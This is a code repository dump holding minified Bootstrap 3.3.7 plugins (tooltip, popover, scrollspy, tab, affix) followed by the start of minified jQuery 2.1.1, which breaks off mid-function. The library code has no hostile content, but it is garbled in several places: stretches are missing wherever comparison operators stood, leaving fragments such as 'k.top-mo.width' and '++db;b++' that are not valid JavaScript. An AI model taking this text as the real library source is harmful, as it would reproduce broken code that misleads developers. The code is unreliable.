this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-mo.width?"left":"left"==h&&k.left-lg.top+g.height&&(e.top=g.top+g.height-i)}else{var j=b.left-f,k=b.left+f+c;jg.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null,a.$element=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;!e&&/destroy|hide/.test(b)||(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");c.VERSION="3.3.7",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:''}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.7",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b=e[a]&&(void 0===e[a+1]||b .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.7",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return e=a-d&&"bottom"},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery); -------------------------------------------------------------------------------- /wupco_static/js/jquery.min.js: -------------------------------------------------------------------------------- 1 | /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */ 2 | !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){return!n.isArray(a)&&a-parseFloat(a)>=0},isPlainObject:function(a){return"object"!==n.type(a)||a.nodeType||n.isWindow(a)?!1:a.constructor&&!j.call(a.constructor.prototype,"isPrototypeOf")?!1:!0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElement("script"),b.text=a,l.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:g.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b||this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function s(a){var b=a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+-new Date,v=a.document,w=0,x=0,y=gb(),z=gb(),A=gb(),B=function(a,b){return a===b&&(l=!0),0},C="undefined",D=1<<31,E={}.hasOwnProperty,F=[],G=F.pop,H=F.push,I=F.push,J=F.slice,K=F.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},L="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",N="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=N.replace("w","w#"),P="\\["+M+"*("+N+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+O+"))|)"+M+"*\\]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),V=new RegExp(Q),W=new RegExp("^"+O+"$"),X={ID:new RegExp("^#("+N+")"),CLASS:new RegExp("^\\.("+N+")"),TAG:new RegExp("^("+N.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+Q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+L+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{I.apply(F=J.call(v.childNodes),v.childNodes),F[v.childNodes.length].nodeType}catch(eb){I={apply:F.length?function(a,b){H.apply(a,J.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if(p&&!e){if(f=_.exec(a))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return I.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return I.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=9===k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+qb(o[l]);w=ab.test(a)&&ob(b.parentNode)||b,x=o.join(",")}if(x)try{return I.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function gb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function hb(a){return a[u]=!0,a}function ib(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function lb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function nb(a){return hb(function(b){return b=+b,hb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function ob(a){return a&&typeof a.getElementsByTagName!==C&&a}c=fb.support={},f=fb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fb.setDocument=function(a){var b,e=a?a.ownerDocument||a:v,g=e.defaultView;return e!==n&&9===e.nodeType&&e.documentElement?(n=e,o=e.documentElement,p=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){m()},!1):g.attachEvent&&g.attachEvent("onunload",function(){m()})),c.attributes=ib(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ib(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="
",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=ib(function(a){return o.appendChild(a).id=u,!e.getElementsByName||!e.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==C&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c=typeof a.getAttributeNode!==C&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==C?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==C&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(e.querySelectorAll))&&(ib(function(a){a.innerHTML="",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+M+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ib(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",Q)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],i=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:k?K.call(k,a)-K.call(k,b):0;if(f===g)return kb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?kb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},e):n},fb.matches=function(a,b){return fb(a,null,null,b)},fb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fb(b,n,null,[a]).length>0},fb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&E.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fb.selectors={cacheLength:50,createPseudo:hb,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+M+")"+a+"("+M+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==C&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?hb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=K.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:hb(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:hb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:hb(function(a){return W.test(a||"")||fb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:nb(function(){return[0]}),last:nb(function(a,b){return[b-1]}),eq:nb(function(a,b,c){return[0>c?c+b:c]}),even:nb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:nb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:nb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:nb(function(a,b,c){for(var d=0>c?c+b:c;++db;b++)d+=a[b].value;return d}function rb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function sb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function tb(a,b,c){for(var d=0,e=b.length;e>d;d++)fb(a,b[d],c);return c}function ub(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function vb(a,b,c,d,e,f){return d&&!d[u]&&(d=vb(d)),e&&!e[u]&&(e=vb(e,f)),hb(function(f,g,h,i){var 